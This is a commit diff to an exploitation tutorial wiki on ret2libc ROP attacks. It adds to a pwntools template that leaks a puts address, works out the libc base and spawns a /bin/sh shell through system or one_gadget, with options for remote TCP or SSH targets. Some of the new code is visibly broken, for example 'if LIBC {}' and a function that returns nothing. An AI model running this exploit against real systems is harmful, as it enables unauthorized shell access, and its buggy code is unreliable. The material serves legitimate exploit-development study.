GitBook: [master] 5 pages and one asset modified

SUMMARY.md

@@ -515,8 +515,8 @@
 * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
   * [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
   * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
-  * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
-  * [ROP - Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-template.md)
+  * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
+    * [ROP - Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
   * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
   * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
   * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)

exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md

@@ -2,15 +2,15 @@
 
 ## Quick Resume
 
-1. Find overflow offset
-2. Find POP\_RDI, PUTS\_PLT and MAIN\_PLT gadgets
-3. Find memory address of puts and guess the libc version \(donwload it\)
-4. Given the library just exploit it
+1. **Find** overflow **offset**
+2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
+3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** \([donwload it](https://LIBC.blukat.me/)\)
+4. With the library, **calculate the ROP and exploit it**
 
 ## Other tutorials and binaries to practice
 
 This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)  
-Another useful tutorial: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/)
+Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
 
 ## Code
 
@@ -32,10 +32,12 @@ int main() {
 gcc -o vuln vuln.c -fno-stack-protector  -no-pie
 ```
 
-## ROP - PWNtools template
+## ROP - Leaking LIBC template
 
-\*\*\*\*[**Find my ROP-PWNtools template here.**](rop-leaking-libc-template.md) I'm going to use the code located there to make the exploit.  
-Download the exploit and place it in the same directory as the vulnerable binary.
+I'm going to use the code located here to make the exploit.  
+Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
+
+{% page-ref page="rop-leaking-libc-template.md" %}
 
 ## 1- Finding the offset
 
@@ -63,11 +65,13 @@ from pwn import *
 cyclic_find(0x6161616b)
 ```
 
-![](../../.gitbook/assets/image%20%28188%29.png)
+![](../../../.gitbook/assets/image%20%28188%29.png)
 
 After finding the offset \(in this case 40\) change the OFFSET variable inside the template using that value.  
 `OFFSET = "A" * 40`
 
+Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
+
 ## 2- Finding Gadgets
 
 Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
@@ -84,7 +88,7 @@ log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
 
 The `PUTS_PLT` is needed to call the **function puts**.  
-The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** \(infinite rounds of exploitation\).It is used at the end of each ROP.  
+The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** \(infinite rounds of exploitation\). **It is used at the end of each ROP to call the program again**.  
 The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
 
 In this step you don't need to execute anything as everything will be found by pwntools during the execution.
@@ -135,7 +139,7 @@ Finally, **main function is called again** so we can exploit the overflow again.
 
 This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** \(which is inside **libc** library\). Now that we have that address we can **search which libc version is being used**.
 
-![](../../.gitbook/assets/image%20%2881%29.png)
+![](../../../.gitbook/assets/image%20%2881%29.png)
 
 As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used \(just find the library in `/lib/x86_64-linux-gnu/libc.so.6`\).  
 But, in a remote exploit case I will explain here how can you find it:
@@ -145,7 +149,7 @@ But, in a remote exploit case I will explain here how can you find it:
 You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me/)  
 It will also allow you to download the discovered version of **libc**
 
-![](../../.gitbook/assets/image%20%2816%29.png)
+![](../../../.gitbook/assets/image%20%2816%29.png)
 
 ### 3.2- Searching for libc version \(2\)
 
@@ -237,13 +241,15 @@ Finally, the **address of exit function** is **called** so the process **exists
 
 **This way the exploit will execute a** _**/bin/sh**_ **shell.**
 
-![](../../.gitbook/assets/image%20%28255%29.png)
+![](../../../.gitbook/assets/image%20%28255%29.png)
 
 ## 4\(2\)- Using ONE\_GADGET
 
-You could also use [ONE\_GADGET ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP**.   
+You could also use [**ONE\_GADGET** ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.   
 However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
 
+![](../../../.gitbook/assets/image%20%28614%29.png)
+
 ```python
 ONE_GADGET = libc.address + 0x4526a
 rop2 = base + p64(ONE_GADGET) + "\x00"*100
@@ -273,7 +279,7 @@ and set the address manually:
 MAIN_PLT = 0x401080
 ```
 
-## Puts not found
+### Puts not found
 
 If the binary is not using Puts you should check if it is using
 

exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md

@@ -12,13 +12,15 @@ LOCAL = False
 REMOTETTCP = True
 REMOTESSH = False
 GDB = False
+USE_ONE_GADGET = False
 
 LOCAL_BIN = "./vuln"
 REMOTE_BIN = "~/vuln" #For ssh
 LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
+ENV = {"LD_PRELOAD": LIBC} if LIBC {}
 
 if LOCAL:
-    P = process(LOCAL_BIN) # start the vuln binary
+    P = process(LOCAL_BIN, env=ENV) # start the vuln binary
     ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
     ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
@@ -139,24 +141,78 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
 ##### FINAL EXPLOITATION #####
 ##############################
 
-BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
-SYSTEM = LIBC.sym["system"]
-EXIT = LIBC.sym["exit"]
+### Via One_gadget (https://github.com/david942j/one_gadget)
+# gem install one_gadget
+def get_one_gadgets(libc):
+	args = ["one_gadget", "-r"]
+	if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
+		args += ["-b", libc.hex()]
+	else:
+		args += [libc]
+	try:
+	    one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
+	except:
+	    print("One_gadget isn't installed")
+	    one_gadgets = []
+	return 
 
-log.info("POP_RDI %s " % hex(POP_RDI))
-log.info("bin/sh %s " % hex(BINSH))
-log.info("system %s " % hex(SYSTEM))
-log.info("exit %s " % hex(EXIT))
+rop2 = b""
+if USE_ONE_GADGET:
+    one_gadgets = get_one_gadgets(LIBC)
+    if one_gadgets:
+        rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
 
-rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
-rop2 = generate_payload_aligned(rop2)
+### Normal/Long exploitation
+if not rop2:
+    BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
+    SYSTEM = LIBC.sym["system"]
+    EXIT = LIBC.sym["exit"]
+    
+    log.info("POP_RDI %s " % hex(POP_RDI))
+    log.info("bin/sh %s " % hex(BINSH))
+    log.info("system %s " % hex(SYSTEM))
+    log.info("exit %s " % hex(EXIT))
+    
+    rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
+    rop2 = generate_payload_aligned(rop2)
+    
 
-
-P.clean()
+print(P.clean())
 P.sendline(rop2)
 
-
 P.interactive() #Interact with your shell :)
 ```
 {% endcode %}
 
+## Common problems
+
+### MAIN\_PLT = elf.symbols\['main'\] not found
+
+If the "main" symbol does not exist. Then you can just where is the main code:
+
+```python
+objdump -d vuln_binary | grep "\.text"
+Disassembly of section .text:
+0000000000401080 <.text>:
+```
+
+and set the address manually:
+
+```python
+MAIN_PLT = 0x401080
+```
+
+### Puts not found
+
+If the binary is not using Puts you should check if it is using
+
+### `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+Try to **subtract 64 bytes to the address of "/bin/sh"**:
+
+```python
+BINSH = next(libc.search("/bin/sh")) - 64
+```
+